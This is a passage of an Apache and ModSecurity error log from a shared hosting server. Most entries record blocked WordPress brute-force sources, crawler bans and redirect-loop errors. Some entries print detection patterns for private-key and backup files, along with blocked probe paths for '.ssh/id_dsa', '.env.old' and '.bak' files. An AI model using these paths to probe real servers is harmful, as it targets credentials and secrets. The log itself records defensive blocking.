[Tue May 26 18:30:46.650285 2026] [security2:error] [pid 998632:tid 998802] [client 143.198.114.199:63425] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "sandbox.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWZfq1OTU2dW0MS1EnFygAAAAs"]
[Tue May 26 18:30:48.410974 2026] [security2:error] [pid 998632:tid 998920] [client 185.177.72.51:31924] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.herbalplus.thedebateafrica.org"] [uri "/mysql.php.bak"] [unique_id "ahWZgK1OTU2dW0MS1EnF7AAAAHs"]
[Tue May 26 18:30:48.427289 2026] [security2:error] [pid 998632:tid 998847] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZfq1OTU2dW0MS1EnFrgAAADU"]
[Tue May 26 18:30:48.552640 2026] [security2:error] [pid 998632:tid 998904] [client 209.141.34.188:56526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 188.34.141.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.cti.hn"] [uri "/wp-login.php"] [unique_id "ahWZgK1OTU2dW0MS1EnF5wAAAGs"]
[Tue May 26 18:30:49.220920 2026] [security2:error] [pid 998632:tid 998661] [remote 88.198.165.116:58550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWZga1OTU2dW0MS1EnF-QAALwk"]
[Tue May 26 18:30:49.928240 2026] [core:error] [pid 998632:tid 998843] [client 132.148.75.231:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:49.928265 2026] [core:error] [pid 998632:tid 998843] [client 132.148.75.231:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:50.290422 2026] [security2:error] [pid 998632:tid 998751] [remote 162.240.52.198:35798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZgq1OTU2dW0MS1EnGKQAAHl8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:30:50.562114 2026] [security2:error] [pid 998632:tid 998861] [client 159.65.166.191:49730] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.jhonparra.jhonweb.com"] [uri "/index.php"] [unique_id "ahWZgq1OTU2dW0MS1EnGLAAAAEM"], referer: http://www.jhonparra.jhonweb.com/
[Tue May 26 18:30:51.715396 2026] [security2:error] [pid 998632:tid 998889] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZga1OTU2dW0MS1EnGAwAAAFw"]
[Tue May 26 18:30:53.650135 2026] [security2:error] [pid 998632:tid 998870] [client 124.43.5.103:9911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZha1OTU2dW0MS1EnGeQAAAEs"]
[Tue May 26 18:30:53.650261 2026] [security2:error] [pid 998632:tid 998870] [client 124.43.5.103:9911] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZha1OTU2dW0MS1EnGeQAAAEs"]
[Tue May 26 18:30:54.232837 2026] [security2:error] [pid 998632:tid 998920] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZg61OTU2dW0MS1EnGTgAAAHs"]
[Tue May 26 18:30:54.544163 2026] [security2:error] [pid 998632:tid 998827] [client 159.65.166.191:51782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.jhonparra.jhonweb.com"] [uri "/index.php"] [unique_id "ahWZhq1OTU2dW0MS1EnGjAAAACM"], referer: https://www.jhonparra.jhonweb.com/
[Tue May 26 18:30:54.598760 2026] [core:error] [pid 998632:tid 998812] [client 5.255.120.167:60980] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:54.598779 2026] [core:error] [pid 998632:tid 998812] [client 5.255.120.167:60980] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:57.175179 2026] [security2:error] [pid 998632:tid 998878] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZhq1OTU2dW0MS1EnGnAAAAFM"]
[Tue May 26 18:30:57.358016 2026] [security2:error] [pid 998632:tid 998908] [client 193.37.33.118:65363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWZia1OTU2dW0MS1EnGygAAAG8"]
[Tue May 26 18:30:58.817492 2026] [autoindex:error] [pid 998632:tid 998802] [client 162.14.81.106:53394] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:30:58.904389 2026] [core:error] [pid 998632:tid 998838] [client 5.255.120.167:38502] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:58.904410 2026] [core:error] [pid 998632:tid 998838] [client 5.255.120.167:38502] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:59.010351 2026] [security2:error] [pid 998632:tid 998918] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZiK1OTU2dW0MS1EnGxQAAAHk"]
[Tue May 26 18:31:00.559328 2026] [security2:error] [pid 998632:tid 998889] [client 130.51.23.23:51024] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWZi61OTU2dW0MS1EnHEAAAAFw"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 18:31:01.046326 2026] [security2:error] [pid 998632:tid 998718] [remote 18.209.220.99:16155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWZjK1OTU2dW0MS1EnHNQAAaT4"]
[Tue May 26 18:31:01.380348 2026] [security2:error] [pid 998632:tid 998742] [remote 18.209.220.99:16155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWZja1OTU2dW0MS1EnHSQAAV1Y"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 18:31:01.827477 2026] [security2:error] [pid 998632:tid 998827] [client 185.191.171.19:16804] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/day/2024-07-02/"] [unique_id "ahWZja1OTU2dW0MS1EnHZQAAACM"]
[Tue May 26 18:31:01.827695 2026] [security2:error] [pid 998632:tid 998827] [client 185.191.171.19:16804] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/day/2024-07-02/"] [unique_id "ahWZja1OTU2dW0MS1EnHZQAAACM"]
[Tue May 26 18:31:02.633370 2026] [security2:error] [pid 998632:tid 998847] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZjK1OTU2dW0MS1EnHMAAAADU"]
[Tue May 26 18:31:02.725428 2026] [security2:error] [pid 998632:tid 998743] [remote 38.95.35.74:42802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWZjq1OTU2dW0MS1EnHfgAAPVc"]
[Tue May 26 18:31:02.951868 2026] [security2:error] [pid 998632:tid 998747] [remote 38.95.35.74:42802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWZjq1OTU2dW0MS1EnHgwAAQVs"], referer: https://rohiniventures.com/wp-login.php
[Tue May 26 18:31:04.075395 2026] [security2:error] [pid 998632:tid 998832] [client 5.255.120.167:38742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "webdisk.anujtradingco.com"] [uri "/___proxy_subdomain_webdisk/.ssh/id_dsa"] [unique_id "ahWZkK1OTU2dW0MS1EnHoQAAACc"]
[Tue May 26 18:31:04.077781 2026] [core:error] [pid 998632:tid 998871] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.077804 2026] [core:error] [pid 998632:tid 998871] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.084176 2026] [core:error] [pid 998632:tid 998828] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.084193 2026] [core:error] [pid 998632:tid 998828] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.106355 2026] [security2:error] [pid 998632:tid 998905] [client 5.255.120.167:38652] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.anujtradingco.com"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahWZkK1OTU2dW0MS1EnHqAAAAGw"]
[Tue May 26 18:31:04.115956 2026] [core:error] [pid 998632:tid 998847] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.115978 2026] [core:error] [pid 998632:tid 998847] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.373554 2026] [security2:error] [pid 998632:tid 998770] [remote 64.233.173.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWZj61OTU2dW0MS1EnHmAAAfG8"]
[Tue May 26 18:31:04.660031 2026] [security2:error] [pid 998632:tid 998897] [client 124.43.5.103:10353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZkK1OTU2dW0MS1EnHtQAAAGQ"]
[Tue May 26 18:31:04.660154 2026] [security2:error] [pid 998632:tid 998897] [client 124.43.5.103:10353] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZkK1OTU2dW0MS1EnHtQAAAGQ"]
[Tue May 26 18:31:04.787347 2026] [core:error] [pid 998632:tid 998876] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.787364 2026] [core:error] [pid 998632:tid 998876] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.788879 2026] [core:error] [pid 998632:tid 998864] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.788903 2026] [core:error] [pid 998632:tid 998864] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.887842 2026] [core:error] [pid 998632:tid 998917] [client 5.255.120.167:38574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.887859 2026] [core:error] [pid 998632:tid 998917] [client 5.255.120.167:38574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.907219 2026] [core:error] [pid 998632:tid 998812] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:04.907241 2026] [core:error] [pid 998632:tid 998812] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:05.033194 2026] [core:error] [pid 998632:tid 998826] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:05.033220 2026] [core:error] [pid 998632:tid 998826] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:05.526438 2026] [security2:error] [pid 998632:tid 998841] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZjq1OTU2dW0MS1EnHfQAAAC8"]
[Tue May 26 18:31:06.232970 2026] [core:error] [pid 998632:tid 998896] [client 5.255.120.167:38804] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:06.232988 2026] [core:error] [pid 998632:tid 998896] [client 5.255.120.167:38804] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:06.246947 2026] [core:error] [pid 998632:tid 998791] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:06.246961 2026] [core:error] [pid 998632:tid 998791] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:06.247448 2026] [core:error] [pid 998632:tid 998895] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:06.247468 2026] [core:error] [pid 998632:tid 998895] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:06.675977 2026] [security2:error] [pid 998632:tid 998667] [remote 88.198.165.116:45752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWZkq1OTU2dW0MS1EnH_QAATg4"]
[Tue May 26 18:31:07.248532 2026] [security2:error] [pid 998632:tid 998887] [client 62.28.146.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZka1OTU2dW0MS1EnH0wAAAFo"]
[Tue May 26 18:31:07.643682 2026] [core:error] [pid 998632:tid 998884] [client 5.255.120.167:55114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:07.643712 2026] [core:error] [pid 998632:tid 998884] [client 5.255.120.167:55114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:07.709001 2026] [core:error] [pid 998632:tid 998892] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:07.709027 2026] [core:error] [pid 998632:tid 998892] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:07.738815 2026] [core:error] [pid 998632:tid 998875] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:07.738838 2026] [core:error] [pid 998632:tid 998875] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:07.908892 2026] [core:error] [pid 998632:tid 998868] [client 5.255.120.167:55094] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:07.908920 2026] [core:error] [pid 998632:tid 998868] [client 5.255.120.167:55094] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:07.910385 2026] [core:error] [pid 998632:tid 998815] [client 5.255.120.167:54962] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:07.910413 2026] [core:error] [pid 998632:tid 998815] [client 5.255.120.167:54962] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:07.929120 2026] [security2:error] [pid 998632:tid 998813] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZka1OTU2dW0MS1EnH5QAAABY"]
[Tue May 26 18:31:08.840862 2026] [core:error] [pid 998632:tid 998917] [client 5.255.120.167:55056] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:08.840883 2026] [core:error] [pid 998632:tid 998917] [client 5.255.120.167:55056] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:08.845415 2026] [core:error] [pid 998632:tid 998834] [client 5.255.120.167:55022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:08.845438 2026] [core:error] [pid 998632:tid 998834] [client 5.255.120.167:55022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:08.900723 2026] [security2:error] [pid 998632:tid 998846] [client 143.198.114.199:52174] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "sandbox.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWZlK1OTU2dW0MS1EnIOwAAADQ"]
[Tue May 26 18:31:09.846328 2026] [http2:info] [pid 1007701:tid 1007701] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 18:31:10.224689 2026] [core:error] [pid 998632:tid 998859] [client 5.255.120.167:54936] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.224717 2026] [core:error] [pid 998632:tid 998859] [client 5.255.120.167:54936] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.226048 2026] [core:error] [pid 1007701:tid 1007831] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.226078 2026] [core:error] [pid 1007701:tid 1007831] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.377827 2026] [core:error] [pid 998632:tid 998892] [client 5.255.120.167:54926] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.377961 2026] [core:error] [pid 998632:tid 998892] [client 5.255.120.167:54926] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.378439 2026] [core:error] [pid 998632:tid 998891] [client 5.255.120.167:54978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
